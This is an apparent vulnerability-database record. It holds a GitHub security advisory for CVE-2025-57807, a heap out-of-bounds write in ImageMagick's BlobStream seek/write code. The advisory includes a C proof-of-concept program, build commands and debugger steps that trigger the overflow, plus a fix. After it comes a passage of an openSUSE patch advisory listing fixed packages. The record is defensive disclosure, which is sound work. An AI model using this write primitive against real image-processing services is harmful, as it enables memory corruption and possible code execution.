  "details": "**Reporter:**\u00a0Lumina Mescuwa  \n**Product:**\u00a0ImageMagick 7 (MagickCore)  \n**Component:**\u00a0`MagickCore/blob.c`\u00a0(Blob I/O - BlobStream)  \n**Tested:**\u00a07.1.2-0 (source tag) and 7.1.2-1 (Homebrew), macOS arm64, clang-17, Q16-HDRI  \n**Impact:**\u00a0Heap out-of-bounds\u00a0**WRITE**\u00a0(attacker-controlled bytes at attacker-chosen offset) \u2192 memory corruption; potential code execution  \n\n---\n\n## Executive Summary\n\nFor memory-backed blobs (**BlobStream**),\u00a0[`SeekBlob()`](https://github.com/ImageMagick/ImageMagick/blob/3fcd081c0278427fc0e8ac40ef75c0a1537792f7/MagickCore/blob.c#L5106-L5134)\u00a0permits advancing the stream\u00a0**offset**\u00a0beyond the current end without increasing capacity. The subsequent\u00a0[`WriteBlob()`](https://github.com/ImageMagick/ImageMagick/blob/3fcd081c0278427fc0e8ac40ef75c0a1537792f7/MagickCore/blob.c#L5915-L5938)\u00a0then expands by\u00a0**`quantum + length`**\u00a0(amortized) instead of\u00a0**`offset + length`**, and copies to\u00a0`data + offset`. When\u00a0`offset \u226b extent`, the copy targets memory beyond the allocation, producing a deterministic heap write on 64-bit builds. No 2\u2076\u2074 arithmetic wrap, external delegates, or policy settings are required.\n\n---\n\n## Affected Scope\n\n- **Versions confirmed:**\u00a07.1.2-0, 7.1.2-1\n    \n- **Architectures:**\u00a0Observed on macOS arm64; architecture-agnostic on LP64\n    \n- Paths: MagickCore blob subsystem \u2014\u00a0**BlobStream**\u00a0([`SeekBlob()`](https://github.com/ImageMagick/ImageMagick/blob/3fcd081c0278427fc0e8ac40ef75c0a1537792f7/MagickCore/blob.c#L5106-L5134)\u00a0and\u00a0[`WriteBlob()`](https://github.com/ImageMagick/ImageMagick/blob/3fcd081c0278427fc0e8ac40ef75c0a1537792f7/MagickCore/blob.c#L5915-L5938)).\n    \n- **Not required:**\u00a0External delegates; special policies; integer wraparound\n    \n\n---\n\n## Technical Root Cause\n\n**Types (LP64):**  \n`offset: MagickOffsetType`\u00a0(signed 64-bit)  \n`extent/length/quantum: size_t`\u00a0(unsigned 64-bit)  \n`data: unsigned char*`\n\n**Contract mismatch:**\n\n- [`SeekBlob()`](https://github.com/ImageMagick/ImageMagick/blob/3fcd081c0278427fc0e8ac40ef75c0a1537792f7/MagickCore/blob.c#L5106-L5134)\u00a0(BlobStream) updates\u00a0`offset`\u00a0to arbitrary positions, including past end,\u00a0**without**\u00a0capacity adjustment.\n    \n- [`WriteBlob()`](https://github.com/ImageMagick/ImageMagick/blob/3fcd081c0278427fc0e8ac40ef75c0a1537792f7/MagickCore/blob.c#L5915-L5938)\u00a0tests\u00a0`offset + length \u003e= extent`\u00a0and grows\u00a0**by**\u00a0`length + quantum`, doubles\u00a0`quantum`, reallocates to\u00a0`extent + 1`, then:\n    \n    ```\n    q = data + (size_t)offset;\n    memmove(q, src, length);\n    ```\n    \n    There is\u00a0**no guarantee**\u00a0that\u00a0`extent \u2265 offset + length`\u00a0post-growth. With\u00a0`offset \u226b extent`,\u00a0`q`\u00a0is beyond the allocation.\n    \n\n**Wrap-free demonstration:**  \nInitialize\u00a0`extent=1`, write one byte (`offset=1`), seek to\u00a0`0x10000000`\u00a0(256 MiB), then write 3\u20134 bytes. Growth remains \u003c\u003c\u00a0`offset + length`; the copy overruns the heap buffer.\n\n---\n\n## Exploitability \u0026 Reachability\n\n- **Primitive:**\u00a0Controlled bytes written at a controlled displacement from the buffer base.\n    \n- **Reachability:**\u00a0Any encode-to-memory flow that forward-seeks prior to writing (e.g., header back-patching, reserved-space strategies). Even if current encoders/writers avoid this, the API contract\u00a0**permits**\u00a0it, thus creating a latent sink for first- or third-party encoders/writers.\n    \n- **Determinism:**\u00a0Once a forward seek past end occurs, the first subsequent write reliably corrupts memory.\n    \n\n---\n\n## Impact Assessment\n\n- **Integrity:**\u00a0High - adjacent object/metadata overwrite plausible.\n    \n- **Availability:**\u00a0High - reliably crashable (ASan and non-ASan).\n    \n- **Confidentiality:**\u00a0High - Successful exploitation to RCE allows the attacker to read all data accessible by the compromised process.\n    \n- **RCE plausibility:**\u00a0Typical of heap OOB writes in long-lived image services; allocator/layout dependent.\n    \n\n---\n\n## CVSS v3.1 Rationale (9.8)\n\n- **AV:N / PR:N / UI:N**\u00a0- server-side image processing is commonly network-reachable without auth or user action.\n    \n- **AC:L**\u00a0- a single forward seek + write suffices; no races or specialized state.\n    \n- **S:U**\u00a0- corruption localized to the ImageMagick process.\n    \n- **C:H / I:H / A:H**\u00a0- A successful exploit leads to RCE, granting full control over the process. This results in a total loss of Confidentiality (reading sensitive data), Integrity (modifying files/data), and Availability (terminating the service).\n    \n\n_Base scoring assumes successful exploitation; environmental mitigations are out of scope of Base metrics._\n\n---\n\n## Violated Invariant\n\n\u003e **Before copying\u00a0`length`\u00a0bytes at\u00a0`offset`, enforce\u00a0`extent \u2265 offset + length`\u00a0with overflow-checked arithmetic.**\n\nThe BlobStream growth policy preserves amortized efficiency but fails to enforce this\u00a0**per-write**\u00a0safety invariant.\n\n---\n\n## Remediation (Principle)\n\nIn\u00a0[`WriteBlob()`](https://github.com/ImageMagick/ImageMagick/blob/3fcd081c0278427fc0e8ac40ef75c0a1537792f7/MagickCore/blob.c#L5915-L5938)\u00a0(BlobStream case):\n\n1. **Checked requirement:**  \n    `need = (size_t)offset + length;`\u00a0\u2192 if\u00a0`need \u003c (size_t)offset`, overflow \u2192 fail.\n    \n2. **Ensure capacity \u2265 need:**  \n    `target = MagickMax(extent + quantum + length, need);`  \n    (Optionally loop, doubling\u00a0`quantum`, until\u00a0`extent \u2265 need`\u00a0to preserve amortization.)\n    \n3. **Reallocate to\u00a0`target + 1`\u00a0before copying;**\u00a0then perform the move.\n    \n\n**Companion hardening (recommended):**\n\n- Document or restrict\u00a0[`SeekBlob()`](https://github.com/ImageMagick/ImageMagick/blob/3fcd081c0278427fc0e8ac40ef75c0a1537792f7/MagickCore/blob.c#L5106-L5134)\u00a0on BlobStream so forward seeks either trigger explicit growth/zero-fill or require the subsequent write to meet the invariant.\n    \n- Centralize blob arithmetic in checked helpers.\n    \n- Unit tests: forward-seek-then-write (success and overflow-reject).\n    \n\n---\n\n## Regression \u0026 Compatibility\n\n- **Behavior change:**\u00a0Forward-seeked writes will either allocate to required size or fail cleanly (overflow/alloc-fail).\n    \n- **Memory profile:**\u00a0Single writes after very large seeks may allocate large buffers; callers requiring sparse behavior should use file-backed streams.\n    \n\n---\n\n## Vendor Verification Checklist\n\n- Reproduce with a minimal in-memory BlobStream harness under ASan.\n    \n- Apply fix; verify\u00a0`extent \u2265 offset + length`\u00a0at all write sites.\n    \n- Add forward-seek test cases (positive/negative).\n    \n- Audit other growth sites (`SetBlobExtent`, stream helpers).\n    \n- Clarify BlobStream seek semantics in documentation.\n    \n- Unit test: forward seek to large offset on\u00a0**BlobStream**\u00a0followed by 1\u20138 byte writes; assert either growth to\u00a0`need`\u00a0or clean failure.\n    \n\n---\n\n# PoC / Reproduction / Notes\n\n## Environment\n\n- **OS/Arch:**\u00a0macOS 14 (arm64)\n    \n- **Compiler:**\u00a0clang-17 with AddressSanitizer\n    \n- **ImageMagick:**\u00a0Q16-HDRI\n    \n- **Prefix:**\u00a0`~/opt/im-7.1.2-0`\n    \n- **`pkg-config`:**\u00a0from PATH (no hard-coded\u00a0`/usr/local/...`)\n    \n\n---\n\n## Build ImageMagick 7.1.2-0 (static, minimal)\n\n```bash\n./configure --prefix=\"$HOME/opt/im-7.1.2-0\" --enable-hdri --with-quantum-depth=16 \\\n  --disable-shared --enable-static --without-modules \\\n  --without-magick-plus-plus --disable-openmp --without-perl \\\n  --without-x --without-lqr --without-gslib\n\nmake -j\"$(sysctl -n hw.ncpu)\"\nmake install\n\n\"$HOME/opt/im-7.1.2-0/bin/magick\" -version \u003e magick_version.txt\n```\n\n---\n\n## Build \u0026 Run the PoC (memory-backed BlobStream)\n\n**`poc.c`:**  \n_Uses private headers (`blob-private.h`) to exercise blob internals; a public-API variant (custom streams) is feasible but unnecessary for triage._\n\n```c\n// poc.c\n\n#include \u003cstdio.h\u003e\n\n#include \u003cstdlib.h\u003e\n\n#include \u003cMagickCore/MagickCore.h\u003e\n\n#include \u003cMagickCore/blob.h\u003e\n\n#include \"MagickCore/blob-private.h\"\n\n  \n\nint main(int argc, char **argv) {\n\nMagickCoreGenesis(argv[0], MagickTrue);\n\nExceptionInfo *e = AcquireExceptionInfo();\n\nImageInfo *ii = AcquireImageInfo();\n\nImage *im = AcquireImage(ii, e);\n\nif (!im) return 1;\n\n  \n\n// 1-byte memory blob \u2192 BlobStream\n\nunsigned char *buf = (unsigned char*) malloc(1);\n\nbuf[0] = 0x41;\n\nAttachBlob(im-\u003eblob, buf, 1); // type=BlobStream, extent=1, offset=0\n\nSetBlobExempt(im, MagickTrue); // don\u0027t free our malloc\u0027d buf\n\n  \n\n// Step 1: write 1 byte (creates BlobInfo + sets offset=1)\n\nunsigned char A = 0x42;\n\n(void) WriteBlob(im, 1, \u0026A);\n\nfprintf(stderr, \"[+] after 1 byte: off=%lld len=%zu\\n\",\n\n(long long) TellBlob(im), (size_t) GetBlobSize(im));\n\n  \n\n// Step 2: seek way past end without growing capacity\n\nconst MagickOffsetType big = (MagickOffsetType) 0x10000000; // 256 MiB\n\n(void) SeekBlob(im, big, SEEK_SET);\n\nfprintf(stderr, \"[+] after seek: off=%lld len=%zu\\n\",\n\n(long long) TellBlob(im), (size_t) GetBlobSize(im));\n\n  \n\n// Step 3: small write \u2192 reallocation grows by quantum+length, not to offset+length\n\n// memcpy then writes to data + offset (OOB)\n\nconst unsigned char payload[] = \"PWN\";\n\n(void) WriteBlob(im, sizeof(payload), payload);\n\n  \n\n// If we get here, it didn\u0027t crash\n\nfprintf(stderr, \"[-] no crash; check ASan flags.\\n\");\n\n  \n\n(void) CloseBlob(im);\n\nDestroyImage(im); DestroyImageInfo(ii); DestroyExceptionInfo(e);\n\nMagickCoreTerminus();\n\nreturn 0;\n\n}\n```\n\n---\n\n`run:`\n\n```bash\n# Use the private prefix for pkg-config\nexport PKG_CONFIG_PATH=\"$HOME/opt/im-7.1.2-0/lib/pkgconfig:$PKG_CONFIG_PATH\"\n\n# Strict ASan for crisp failure\nexport ASAN_OPTIONS=\u0027halt_on_error=1:abort_on_error=1:detect_leaks=0:fast_unwind_on_malloc=0\u0027\n\n# Compile (static link pulls transitive deps via --static)\nclang -std=c11 -g -O1 -fno-omit-frame-pointer -fsanitize=address -o poc poc.c \\\n  $(pkg-config --cflags MagickCore-7.Q16HDRI) \\\n  $(pkg-config --static --libs MagickCore-7.Q16HDRI)\n\n# Execute and capture\n./poc 2\u003e\u00261 | tee asan.log\n```\n\n**Expected markers prior to the fault:**\n\n```\n[+] after 1 byte: off=1 len=1\n[+] after seek:  off=268435456 len=1\n```\n\nAn ASan\u00a0**WRITE**\u00a0crash in\u00a0[`WriteBlob`](https://github.com/ImageMagick/ImageMagick/blob/3fcd081c0278427fc0e8ac40ef75c0a1537792f7/MagickCore/blob.c#L5915-L5938)\u00a0follows (top frames:\u00a0`WriteBlob blob.c:\u003cline\u003e`, then\u00a0`_platform_memmove`\u00a0/\u00a0`__sanitizer_internal_memmove`).\n\n---\n\n## Debugger Verification (manual)\n\nLLDB can be used to snapshot the invariants; ASan alone is sufficient.\n\n```\nlldb ./poc\n(lldb) settings set use-color false\n(lldb) break set -n WriteBlob\n(lldb) run\n\n# First stop (prime write)\n(lldb) frame var length\n(lldb) frame var image-\u003eblob-\u003etype image-\u003eblob-\u003eoffset image-\u003eblob-\u003elength image-\u003eblob-\u003eextent image-\u003eblob-\u003equantum image-\u003eblob-\u003emapped\n(lldb) continue\n\n# Second stop (post-seek write)\n(lldb) frame var length\n(lldb) frame var image-\u003eblob-\u003etype image-\u003eblob-\u003eoffset image-\u003eblob-\u003elength image-\u003eblob-\u003eextent image-\u003eblob-\u003equantum image-\u003eblob-\u003emapped\n(lldb) expr -- (unsigned long long)image-\u003eblob-\u003eoffset + (unsigned long long)length\n(lldb) expr -- (void*)((unsigned char*)image-\u003eblob-\u003edata + (size_t)image-\u003eblob-\u003eoffset)\n\n# Into the fault; if inside memmove (no locals):\n(lldb) bt\n(lldb) frame select 1\n(lldb) frame var image-\u003eblob-\u003eoffset image-\u003eblob-\u003elength image-\u003eblob-\u003eextent image-\u003eblob-\u003equantum\n```\n\n**Expected at second stop:**  \n`type = BlobStream`\u00a0\u00b7\u00a0`offset \u2248 0x10000000`\u00a0(256 MiB) \u00b7\u00a0`length \u2248 3\u20134`\u00a0\u00b7\u00a0`extent \u2248 64 KiB`\u00a0(\u226a\u00a0`offset + length`) \u00b7\u00a0`quantum \u2248 128 KiB`\u00a0\u00b7\u00a0`mapped = MagickFalse`\u00a0\u00b7\u00a0`data + offset`\u00a0far beyond base; next\u00a0`continue`\u00a0crashes in\u00a0`_platform_memmove`.\n    \n---\n\n## Credits\n\n**Reported by:**\u00a0Lumina Mescuwa\n\n---",
  "id": "GHSA-23hg-53q6-hqfg",
  "modified": "2025-09-10T20:49:20Z",
  "published": "2025-09-05T20:09:19Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-23hg-53q6-hqfg"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-57807"
    },
    {
      "type": "WEB",
      "url": "https://github.com/ImageMagick/ImageMagick/commit/077a417a19a5ea8c85559b602754a5b928eef23e"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/ImageMagick/ImageMagick"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:H/PR:H/UI:R/S:U/C:L/I:L/A:L",
      "type": "CVSS_V3"
    }
  ],
  "summary": "ImageMagick BlobStream Forward-Seek Under-Allocation"
}

opensuse-su-2025:15543-1

Vulnerability from csaf_opensuse

Published

2025-09-11 00:00

Modified

2025-09-11 00:00

Summary

ImageMagick-7.1.2.3-1.1 on GA media

Notes

Title of the patch

ImageMagick-7.1.2.3-1.1 on GA media

Description of the patch

These are all security issues fixed in the ImageMagick-7.1.2.3-1.1 package on the GA media of openSUSE Tumbleweed.

Patchnames

openSUSE-Tumbleweed-2025-15543

CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).

JSON

To clipboard

{
  "document": {
    "aggregate_severity": {
      "namespace": "https://www.suse.com/support/security/rating/",
      "text": "moderate"
    },
    "category": "csaf_security_advisory",
    "csaf_version": "2.0",
    "distribution": {
      "text": "Copyright 2024 SUSE LLC. All rights reserved.",
      "tlp": {
        "label": "WHITE",
        "url": "https://www.first.org/tlp/"
      }
    },
    "lang": "en",
    "notes": [
      {
        "category": "summary",
        "text": "ImageMagick-7.1.2.3-1.1 on GA media",
        "title": "Title of the patch"
      },
      {
        "category": "description",
        "text": "These are all security issues fixed in the ImageMagick-7.1.2.3-1.1 package on the GA media of openSUSE Tumbleweed.",
        "title": "Description of the patch"
      },
      {
        "category": "details",
        "text": "openSUSE-Tumbleweed-2025-15543",
        "title": "Patchnames"
      },
      {
        "category": "legal_disclaimer",
        "text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
        "title": "Terms of use"
      }
    ],
    "publisher": {
      "category": "vendor",
      "contact_details": "https://www.suse.com/support/security/contact/",
      "name": "SUSE Product Security Team",
      "namespace": "https://www.suse.com/"
    },
    "references": [
      {
        "category": "external",
        "summary": "SUSE ratings",
        "url": "https://www.suse.com/support/security/rating/"
      },
      {
        "category": "self",
        "summary": "URL of this CSAF notice",
        "url": "https://ftp.suse.com/pub/projects/security/csaf/opensuse-su-2025_15543-1.json"
      },
      {
        "category": "self",
        "summary": "SUSE CVE CVE-2025-57807 page",
        "url": "https://www.suse.com/security/cve/CVE-2025-57807/"
      }
    ],
    "title": "ImageMagick-7.1.2.3-1.1 on GA media",
    "tracking": {
      "current_release_date": "2025-09-11T00:00:00Z",
      "generator": {
        "date": "2025-09-11T00:00:00Z",
        "engine": {
          "name": "cve-database.git:bin/generate-csaf.pl",
          "version": "1"
        }
      },
      "id": "openSUSE-SU-2025:15543-1",
      "initial_release_date": "2025-09-11T00:00:00Z",
      "revision_history": [
        {
          "date": "2025-09-11T00:00:00Z",
          "number": "1",
          "summary": "Current version"
        }
      ],
      "status": "final",
      "version": "1"
    }
  },
  "product_tree": {
    "branches": [
      {
        "branches": [
          {
            "branches": [
              {
                "category": "product_version",
                "name": "ImageMagick-7.1.2.3-1.1.aarch64",
                "product": {
                  "name": "ImageMagick-7.1.2.3-1.1.aarch64",
                  "product_id": "ImageMagick-7.1.2.3-1.1.aarch64"
                }
              },
              {
                "category": "product_version",
                "name": "ImageMagick-config-7-SUSE-7.1.2.3-1.1.aarch64",
                "product": {
                  "name": "ImageMagick-config-7-SUSE-7.1.2.3-1.1.aarch64",
                  "product_id": "ImageMagick-config-7-SUSE-7.1.2.3-1.1.aarch64"
                }
              },
              {
                "category": "product_version",
                "name": "ImageMagick-devel-7.1.2.3-1.1.aarch64",
                "product": {
                  "name": "ImageMagick-devel-7.1.2.3-1.1.aarch64",
                  "product_id": "ImageMagick-devel-7.1.2.3-1.1.aarch64"
                }
              },
              {
                "category": "product_version",
                "name": "ImageMagick-devel-32bit-7.1.2.3-1.1.aarch64",
                "product": {
                  "name": "ImageMagick-devel-32bit-7.1.2.3-1.1.aarch64",
                  "product_id": "ImageMagick-devel-32bit-7.1.2.3-1.1.aarch64"
                }
              },
              {
                "category": "product_version",
                "name": "ImageMagick-doc-7.1.2.3-1.1.aarch64",
                "product": {
                  "name": "ImageMagick-doc-7.1.2.3-1.1.aarch64",
                  "product_id": "ImageMagick-doc-7.1.2.3-1.1.aarch64"
                }
              },
              {
                "category": "product_version",
                "name": "ImageMagick-extra-7.1.2.3-1.1.aarch64",
                "product": {
                  "name": "ImageMagick-extra-7.1.2.3-1.1.aarch64",
                  "product_id": "ImageMagick-extra-7.1.2.3-1.1.aarch64"
                }
              },
              {
                "category": "product_version",
                "name": "libMagick++-7_Q16HDRI5-7.1.2.3-1.1.aarch64",
                "product": {
                  "name": "libMagick++-7_Q16HDRI5-7.1.2.3-1.1.aarch64",
                  "product_id": "libMagick++-7_Q16HDRI5-7.1.2.3-1.1.aarch64"
                }
              },
              {
                "category": "product_version",
                "name": "libMagick++-7_Q16HDRI5-32bit-7.1.2.3-1.1.aarch64",
                "product": {
                  "name": "libMagick++-7_Q16HDRI5-32bit-7.1.2.3-1.1.aarch64",
                  "product_id": "libMagick++-7_Q16HDRI5-32bit-7.1.2.3-1.1.aarch64"
                }
              },
              {
                "category": "product_version",
                "name": "libMagick++-devel-7.1.2.3-1.1.aarch64",
                "product": {
                  "name": "libMagick++-devel-7.1.2.3-1.1.aarch64",
                  "product_id": "libMagick++-devel-7.1.2.3-1.1.aarch64"
                }
              },
              {
                "category": "product_version",
                "name": "libMagick++-devel-32bit-7.1.2.3-1.1.aarch64",
                "product": {
                  "name": "libMagick++-devel-32bit-7.1.2.3-1.1.aarch64",
                  "product_id": "libMagick++-devel-32bit-7.1.2.3-1.1.aarch64"
                }
              },
              {
                "category": "product_version",
                "name": "libMagickCore-7_Q16HDRI10-7.1.2.3-1.1.aarch64",
                "product": {
                  "name": "libMagickCore-7_Q16HDRI10-7.1.2.3-1.1.aarch64",
                  "product_id": "libMagickCore-7_Q16HDRI10-7.1.2.3-1.1.aarch64"
                }
              },
              {
                "category": "product_version",
                "name": "libMagickCore-7_Q16HDRI10-32bit-7.1.2.3-1.1.aarch64",
                "product": {
                  "name": "libMagickCore-7_Q16HDRI10-32bit-7.1.2.3-1.1.aarch64",
                  "product_id": "libMagickCore-7_Q16HDRI10-32bit-7.1.2.3-1.1.aarch64"
                }
              },
              {
                "category": "product_version",
                "name": "libMagickWand-7_Q16HDRI10-7.1.2.3-1.1.aarch64",
                "product": {
                  "name": "libMagickWand-7_Q16HDRI10-7.1.2.3-1.1.aarch64",
                  "product_id": "libMagickWand-7_Q16HDRI10-7.1.2.3-1.1.aarch64"
                }
              },
              {
                "category": "product_version",
                "name": "libMagickWand-7_Q16HDRI10-32bit-7.1.2.3-1.1.aarch64",
                "product": {
                  "name": "libMagickWand-7_Q16HDRI10-32bit-7.1.2.3-1.1.aarch64",
                  "product_id": "libMagickWand-7_Q16HDRI10-32bit-7.1.2.3-1.1.aarch64"
                }
              },
              {
                "category": "product_version",
                "name": "perl-PerlMagick-7.1.2.3-1.1.aarch64",
                "product": {
                  "name": "perl-PerlMagick-7.1.2.3-1.1.aarch64",
                  "product_id": "perl-PerlMagick-7.1.2.3-1.1.aarch64"
                }
              }
            ],
            "category": "architecture",
            "name": "aarch64"
          },
          {
            "branches": [
              {
                "category": "product_version",
                "name": "ImageMagick-7.1.2.3-1.1.ppc64le",
                "product": {
                  "name": "ImageMagick-7.1.2.3-1.1.ppc64le",
                  "product_id": "ImageMagick-7.1.2.3-1.1.ppc64le"
                }
              },
              {
                "category": "product_version",
                "name": "ImageMagick-config-7-SUSE-7.1.2.3-1.1.ppc64le",
                "product": {
                  "name": "ImageMagick-config-7-SUSE-7.1.2.3-1.1.ppc64le",
                  "product_id": "ImageMagick-config-7-SUSE-7.1.2.3-1.1.ppc64le"
                }
              },
              {
                "category": "product_version",
                "name": "ImageMagick-devel-7.1.2.3-1.1.ppc64le",
                "product": {
                  "name": "ImageMagick-devel-7.1.2.3-1.1.ppc64le",
                  "product_id": "ImageMagick-devel-7.1.2.3-1.1.ppc64le"
                }
              },
              {
                "category": "product_version",
                "name": "ImageMagick-devel-32bit-7.1.2.3-1.1.ppc64le",
                "product": {
                  "name": "ImageMagick-devel-32bit-7.1.2.3-1.1.ppc64le",
                  "product_id": "ImageMagick-devel-32bit-7.1.2.3-1.1.ppc64le"
                }
              },
              {
                "category": "product_version",
                "name": "ImageMagick-doc-7.1.2.3-1.1.ppc64le",
                "product": {
                  "name": "ImageMagick-doc-7.1.2.3-1.1.ppc64le",
                  "product_id": "ImageMagick-doc-7.1.2.3-1.1.ppc64le"
                }
              },
              {
                "category": "product_version",
                "name": "ImageMagick-extra-7.1.2.3-1.1.ppc64le",
                "product": {
                  "name": "ImageMagick-extra-7.1.2.3-1.1.ppc64le",
                  "product_id": "ImageMagick-extra-7.1.2.3-1.1.ppc64le"
                }
              },
              {
                "category": "product_version",
                "name": "libMagick++-7_Q16HDRI5-7.1.2.3-1.1.ppc64le",
                "product": {
                  "name": "libMagick++-7_Q16HDRI5-7.1.2.3-1.1.ppc64le",
                  "product_id": "libMagick++-7_Q16HDRI5-7.1.2.3-1.1.ppc64le"
                }
              },
              {
                "category": "product_version",
                "name": "libMagick++-7_Q16HDRI5-32bit-7.1.2.3-1.1.ppc64le",
                "product": {
                  "name": "libMagick++-7_Q16HDRI5-32bit-7.1.2.3-1.1.ppc64le",
                  "product_id": "libMagick++-7_Q16HDRI5-32bit-7.1.2.3-1.1.ppc64le"
                }
              },
              {
                "category": "product_version",
                "name": "libMagick++-devel-7.1.2.3-1.1.ppc64le",
                "product": {
                  "name": "libMagick++-devel-7.1.2.3-1.1.ppc64le",
                  "product_id": "libMagick++-devel-7.1.2.3-1.1.ppc64le"
                }
              },
              {
                "category": "product_version",
                "name": "libMagick++-devel-32bit-7.1.2.3-1.1.ppc64le",
                "product": {
                  "name": "libMagick++-devel-32bit-7.1.2.3-1.1.ppc64le",
                  "product_id": "libMagick++-devel-32bit-7.1.2.3-1.1.ppc64le"
                }
              },
              {
                "category": "product_version",
                "name": "libMagickCore-7_Q16HDRI10-7.1.2.3-1.1.ppc64le",
                "product": {
                  "name": "libMagickCore-7_Q16HDRI10-7.1.2.3-1.1.ppc64le",
                  "product_id": "libMagickCore-7_Q16HDRI10-7.1.2.3-1.1.ppc64le"
                }
              },
              {
                "category": "product_version",
                "name": "libMagickCore-7_Q16HDRI10-32bit-7.1.2.3-1.1.ppc64le",
                "product": {
                  "name": "libMagickCore-7_Q16HDRI10-32bit-7.1.2.3-1.1.ppc64le",
                  "product_id": "libMagickCore-7_Q16HDRI10-32bit-7.1.2.3-1.1.ppc64le"
                }
              },
              {
                "category": "product_version",
                "name": "libMagickWand-7_Q16HDRI10-7.1.2.3-1.1.ppc64le",
                "product": {
                  "name": "libMagickWand-7_Q16HDRI10-7.1.2.3-1.1.ppc64le",
                  "product_id": "libMagickWand-7_Q16HDRI10-7.1.2.3-1.1.ppc64le"
                }
              },
              {
                "category": "product_version",
                "name": "libMagickWand-7_Q16HDRI10-32bit-7.1.2.3-1.1.ppc64le",
                "product": {
                  "name": "libMagickWand-7_Q16HDRI10-32bit-7.1.2.3-1.1.ppc64le",
                  "product_id": "libMagickWand-7_Q16HDRI10-32bit-7.1.2.3-1.1.ppc64le"
                }
              },
              {
                "category": "product_version",
                "name": "perl-PerlMagick-7.1.2.3-1.1.ppc64le",
                "product": {
                  "name": "perl-PerlMagick-7.1.2.3-1.1.ppc64le",
                  "product_id": "perl-PerlMagick-7.1.2.3-1.1.ppc64le"
                }
              }
            ],
            "category": "architecture",
            "name": "ppc64le"
          },
          {
            "branches": [
              {
                "category": "product_version",
                "name": "ImageMagick-7.1.2.3-1.1.s390x",
                "product": {
                  "name": "ImageMagick-7.1.2.3-1.1.s390x",
                  "product_id": "ImageMagick-7.1.2.3-1.1.s390x"
                }
              },
              {
                "category": "product_version",
                "name": "ImageMagick-config-7-SUSE-7.1.2.3-1.1.s390x",
                "product": {
                  "name": "ImageMagick-config-7-SUSE-7.1.2.3-1.1.s390x",
                  "product_id": "ImageMagick-config-7-SUSE-7.1.2.3-1.1.s390x"
                }
              },
              {
                "category": "product_version",
                "name": "ImageMagick-devel-7.1.2.3-1.1.s390x",
                "product": {
                  "name": "ImageMagick-devel-7.1.2.3-1.1.s390x",
                  "product_id": "ImageMagick-devel-7.1.2.3-1.1.s390x"
                }
              },
              {
                "category": "product_version",
                "name": "ImageMagick-devel-32bit-7.1.2.3-1.1.s390x",
                "product": {
                  "name": "ImageMagick-devel-32bit-7.1.2.3-1.1.s390x",
                  "product_id": "ImageMagick-devel-32bit-7.1.2.3-1.1.s390x"
                }
              },
              {
                "category": "product_version",
                "name": "ImageMagick-doc-7.1.2.3-1.1.s390x",
                "product": {
                  "name": "ImageMagick-doc-7.1.2.3-1.1.s390x",
                  "product_id": "ImageMagick-doc-7.1.2.3-1.1.s390x"
                }
              },
              {
                "category": "product_version",
                "name": "ImageMagick-extra-7.1.2.3-1.1.s390x",
                "product": {
                  "name": "ImageMagick-extra-7.1.2.3-1.1.s390x",
                  "product_id": "ImageMagick-extra-7.1.2.3-1.1.s390x"
                }
              },
              {
                "category": "product_version",
                "name": "libMagick++-7_Q16HDRI5-7.1.2.3-1.1.s390x",
                "product": {
                  "name": "libMagick++-7_Q16HDRI5-7.1.2.3-1.1.s390x",
                  "product_id": "libMagick++-7_Q16HDRI5-7.1.2.3-1.1.s390x"
                }
              },
              {
                "category": "product_version",
                "name": "libMagick++-7_Q16HDRI5-32bit-7.1.2.3-1.1.s390x",
                "product": {
                  "name": "libMagick++-7_Q16HDRI5-32bit-7.1.2.3-1.1.s390x",
                  "product_id": "libMagick++-7_Q16HDRI5-32bit-7.1.2.3-1.1.s390x"
                }
              },
              {
                "category": "product_version",
                "name": "libMagick++-devel-7.1.2.3-1.1.s390x",
                "product": {
                  "name": "libMagick++-devel-7.1.2.3-1.1.s390x",
                  "product_id": "libMagick++-devel-7.1.2.3-1.1.s390x"
                }
              },
              {
                "category": "product_version",
                "name": "libMagick++-devel-32bit-7.1.2.3-1.1.s390x",
                "product": {
                  "name": "libMagick++-devel-32bit-7.1.2.3-1.1.s390x",
                  "product_id": "libMagick++-devel-32bit-7.1.2.3-1.1.s390x"
                }
              },
              {
                "category": "product_version",
                "name": "libMagickCore-7_Q16HDRI10-7.1.2.3-1.1.s390x",
                "product": {
                  "name": "libMagickCore-7_Q16HDRI10-7.1.2.3-1.1.s390x",
                  "product_id": "libMagickCore-7_Q16HDRI10-7.1.2.3-1.1.s390x"
                }
              },
              {
                "category": "product_version",
                "name": "libMagickCore-7_Q16HDRI10-32bit-7.1.2.3-1.1.s390x",
                "product": {
                  "name": "libMagickCore-7_Q16HDRI10-32bit-7.1.2.3-1.1.s390x",
                  "product_id": "libMagickCore-7_Q16HDRI10-32bit-7.1.2.3-1.1.s390x"
                }
              },
              {
                "category": "product_version",
                "name": "libMagickWand-7_Q16HDRI10-7.1.2.3-1.1.s390x",
                "product": {
                  "name": "libMagickWand-7_Q16HDRI10-7.1.2.3-1.1.s390x",
                  "product_id": "libMagickWand-7_Q16HDRI10-7.1.2.3-1.1.s390x"
                }
              },
              {
                "category": "product_version",
                "name": "libMagickWand-7_Q16HDRI10-32bit-7.1.2.3-1.1.s390x",
                "product": {
                  "name": "libMagickWand-7_Q16HDRI10-32bit-7.1.2.3-1.1.s390x",
                  "product_id": "libMagickWand-7_Q16HDRI10-32bit-7.1.2.3-1.1.s390x"
                }
              },
              {
                "category": "product_version",
                "name": "perl-PerlMagick-7.1.2.3-1.1.s390x",
                "product": {
                  "name": "perl-PerlMagick-7.1.2.3-1.1.s390x",
                  "product_id": "perl-PerlMagick-7.1.2.3-1.1.s390x"
                }
              }
            ],
            "category": "architecture",
            "name": "s390x"
          },
          {
            "branches": [
              {
                "category": "product_version",
                "name": "ImageMagick-7.1.2.3-1.1.x86_64",
                "product": {
                  "name": "ImageMagick-7.1.2.3-1.1.x86_64",
                  "product_id": "ImageMagick-7.1.2.3-1.1.x86_64"
                }
              },
              {
                "category": "product_version",
